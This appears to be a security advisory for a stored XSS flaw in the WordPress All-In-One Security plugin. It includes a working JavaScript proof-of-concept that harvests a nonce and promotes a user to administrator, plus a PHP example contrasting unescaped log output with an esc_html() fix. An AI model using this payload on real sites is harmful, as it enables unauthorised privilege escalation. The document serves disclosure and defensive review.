WordPress Plugin Vulnerabilities
All-In-One Security (AIOS) < 5.1.5 - Admin+ Stored XSS
Description
The plugin does not escape the content of log files before outputting it on the plugin's admin page. A user who already holds administrator privileges (admin+) can therefore plant a bogus log file containing JavaScript, and that script executes in the browser of any administrator who views the page. Because an administrator account is required to plant the file, the impact is limited to attacks by one administrator against others (for example to escalate a lower-privileged account, as in the proof of concept below).
Proof of Concept
Create a file (e.g. test.pdf) whose content is the JavaScript payload on a single line (the payload must sit on one line) and open that file through the plugin's Host system logs page. An example payload that promotes the user with ID 5 to administrator: it fetches the users list to obtain the bulk-action nonce, then submits the bulk "change role" action with that nonce.

    <script>
    fetch("https://<host>/wp-admin/users.php?update=promote")
      .then(function(response) { return response.text(); })
      .then(function(html) {
        // Parse the users list page and pull out the bulk-action nonce
        var parser = new DOMParser();
        var doc = parser.parseFromString(html, "text/html");
        return doc.querySelector("#_wpnonce").value;
      })
      .then(function(nonce) {
        // Submit the bulk role change for user ID 5 with the harvested nonce.
        // changeit carries the label of the Change button (here the Polish "Zmień");
        // only its presence is checked by wp-admin/users.php.
        return fetch("https://<host>/wp-admin/users.php?s=&_wpnonce=" + nonce + "&_wp_http_referer=%2Fwp-admin%2Fusers.php&action=-1&new_role=administrator&changeit=Zmie%C5%84&paged=1&users%5B%5D=5&action2=-1&new_role2=administrator")
          .then(function(response) { return response.text(); })
          .then(function(body) { console.log(body); });
      })
      .catch(function(err) { console.log('Failed to fetch page: ', err); });
    </script>

The same payload collapsed onto one line, as it has to be placed in the planted file (wrap it in <script> tags):

    fetch("https://<host>/wp-admin/users.php?update=promote").then(function(response) {return response.text();}).then(function(html) {var parser = new DOMParser();var doc = parser.parseFromString(html, "text/html");return doc.querySelector("#_wpnonce").value;}).then(function(nonce) {return fetch("https://<host>/wp-admin/users.php?s=&_wpnonce=" + nonce + "&_wp_http_referer=%2Fwp-admin%2Fusers.php&action=-1&new_role=administrator&changeit=Zmie%C5%84&paged=1&users%5B%5D=5&action2=-1&new_role2=administrator").then(function(response) {return response.text();}).then(function(body) {console.log(body);});}).catch(function(err) {console.log('Failed to fetch page: ', err);});

Replace the placeholders in angle brackets (<host>) with the target's values.
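The bug class behind this advisory is output without escaping. The following is an added example, not code from the AIOS plugin: a minimal log-viewer page that reproduces the defect next to the corrected version. The log lines are constructed sample input; esc_html() is WordPress's own escaping function, and the fallback definition exists only so the file also runs from the PHP CLI outside WordPress.

```php
<?php
// Added example (not AIOS code): a minimal "view a log file" admin page
// showing the unescaped-output bug described in the advisory and its fix.
// Assumption: inside WordPress esc_html() already exists; the fallback below
// makes the file runnable from the CLI for demonstration only.

if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8' );
    }
}

// Constructed sample log: the second line is a planted one-line payload.
$log_lines = array(
    '[2023-03-20 10:00:01] Login OK for user admin from 198.51.100.7',
    '<script>fetch("/wp-admin/users.php")</script>',
    '[2023-03-20 10:00:05] Login FAILED for user test from 198.51.100.9',
);

// Vulnerable: each raw line goes straight into the page, so a planted
// <script> line executes in the browser of the administrator viewing it.
function render_log_vulnerable( array $lines ) {
    $html = "<pre>\n";
    foreach ( $lines as $line ) {
        $html .= $line . "\n";
    }
    return $html . "</pre>\n";
}

// Fixed: escape every line at output time. esc_html() converts < > & " '
// into entities, so the planted line is displayed as text, never parsed as markup.
function render_log_safe( array $lines ) {
    $html = "<pre>\n";
    foreach ( $lines as $line ) {
        $html .= esc_html( $line ) . "\n";
    }
    return $html . "</pre>\n";
}

echo "--- vulnerable ---\n", render_log_vulnerable( $log_lines );
echo "--- safe ---\n", render_log_safe( $log_lines );
```

When reviewing any plugin feature that displays files from disk (logs, backups, debug output), the check is the same: every value read from the file must pass through esc_html() (or esc_attr()/esc_textarea() depending on the HTML context) at the point it is echoed, regardless of who is allowed to write the file.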
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Bartłomiej Marek
Submitter
Bartłomiej Marek
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-03-20
Added
2023-03-20
Last Updated
2023-03-20